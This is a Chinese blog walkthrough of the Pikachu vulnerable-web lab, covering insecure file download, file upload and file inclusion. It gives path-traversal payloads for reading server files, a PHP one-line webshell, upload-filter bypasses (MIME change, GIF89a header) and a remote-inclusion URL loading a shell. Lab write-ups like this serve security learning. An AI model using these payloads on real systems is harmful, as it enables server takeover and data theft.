一:文件下载
pikachu圣经之文件下载:
不安全的文件下载概述
文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。 如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。
此时如果 攻击者提交的不是一个程序预期的的文件名,而是一个精心构造的路径(比如../../../etc/passwd),则很有可能会直接将该指定的文件下载下来。 从而导致后台敏感信息(密码文件、源代码等)被下载。所以,在设计文件下载功能时,如果下载的目标文件是由前端传进来的,则一定要对传进来的文件进行安全考虑。 切记:所有与前端交互的数据都是不安全的,不能掉以轻心!
来看靶场吧,点击出现了下载任务,而?filename=kb.png
对比发现就是 ?filename=xxx.png变化,将其execdownload.php?filename=ai.png写到url看是否可以正常下载
发现可以,那我们尝试拼接下载其他文件,比如下载一下execdownload.php
伪造修改得href="execdownload.php?filename=./../execdownload.php",再点牢大头像弹出下载
利用成功。
二:文件上传
pikachu圣经之文件上传:
不安全的文件上传漏洞概述
文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。 如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨,则攻击着可能会上传一些恶意的文件,比如一句话木马,从而导致后台服务器被webshell。
所以,在设计文件上传功能时,一定要对传进来的文件进行严格的安全考虑。比如:
--验证文件类型、后缀名、大小;
--验证文件的上传方式;
--对文件进行一定复杂的重命名;
--不要暴露文件上传后的路径;
--等等...
1.client check
只允许上传图片
写一个一句话木马<?php eval($_POST['x']); ?> 写入muma.txt,修改后缀为jpg上传,抓包修改后缀为.php,让其解析php代码
上传成功后,知道文件保存地址,使用蚁剑连接
连接成功。
看一下代码,是前端js白名单过滤,so也可以禁用js来上传php木马。
2.MIME type
同样利用上一关的方法仍能上传,
MIME 类型的话学习点在于改Content-Type: application/octet-stream为Content-Type: image/jpeg
当上传一个.php文件时,为Content-Type: application/octet-stream
需要修改mime上传
上传成功,蚁剑连接
成功连接。
3.getimagesize()
首先了解一下这个函数
总之是一个判断图片大小和类型的一个函数,也避免了直接更改后缀名的绕过。
可以尝试上传一个图片马,
上传成功,访问一下路径
成功,但是上传的jpg文件中的php代码是不能被解析的,需要文件包含漏洞来利用。
就利用pikachu的本地包含,
为什么会是解析错误的呢,求师傅求解!!!
再用另一种方法
直接加GIF89a
上传成功
再利用一下文件包含
这次成了!
三:文件包含
pikachu圣经之文件包含:
File Inclusion(文件包含漏洞)概述
文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了:
include(),include_once()
require(),require_once()
这些文件包含函数,这些函数在代码设计中被经常使用到。大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则可能会引发文件包含漏洞。 攻击着会指定一个“意想不到”的文件让包含函数去执行,从而造成恶意操作。 根据不同的配置环境,文件包含漏洞分为如下两种情况:
1.本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击着更多的会包含一些 固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。
2.远程文件包含漏洞:能够通过url地址对远程的文件进行包含,这意味着攻击者可以传入任意的代码,这种情况没啥好说的,准备挂彩。因此,在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数,如果非要这么做,也一定要做严格的白名单策略进行过滤。
1:本地文件包含
首先随便挑俩球星看看,第一个就看到了牢大,
对比发现url ?filename=file2.php中1,2在变化,猜测存在利用点,我们是不是可以修改数字呢,尝试0,报错,6缺出现了一个密秘!一个账号密码
还能如何利用呢,../ 是返回上一层菜单的路径,能在这利用来读取文件吗,试试吧!
?filename=file1.php&submit=提交 我们当前是在这一级目录
先加一个../报错信息D:\phpstudy_pro\WWW\pikachu\vul\fileinclude\fi_local.php
由此来推出读到D:\windows\win.ini 需要往上一级目录../../../../../../到D:/ ,所以payload为
?filename=../../../../../../windows/win.ini&submit=提交
读到win.ini信息
2:远程文件包含
Allow_url_include=on //打开此配置
远程文件包含就是利用目标服务器上的文件包含漏洞包含自己服务器上的文件。
比如我们攻击者写一个一句话木马,来让本地服务器包含我们这个木马来进行攻击。
包含远程服务器上的文件,现在直接使用本地服务器模拟。
?filename=http://127.0.0.1/qwq.txt
http://127.0.0.1/pikachu/vul/fileinclude/fi_remote.php?filename=http://127.0.0.1/qwq.txt&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
再使用蚁剑连接即可。
目录
也可以本地文件包含使用绝对路径:
利用php伪协议包含:
成功执行phpinfo();
2818
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
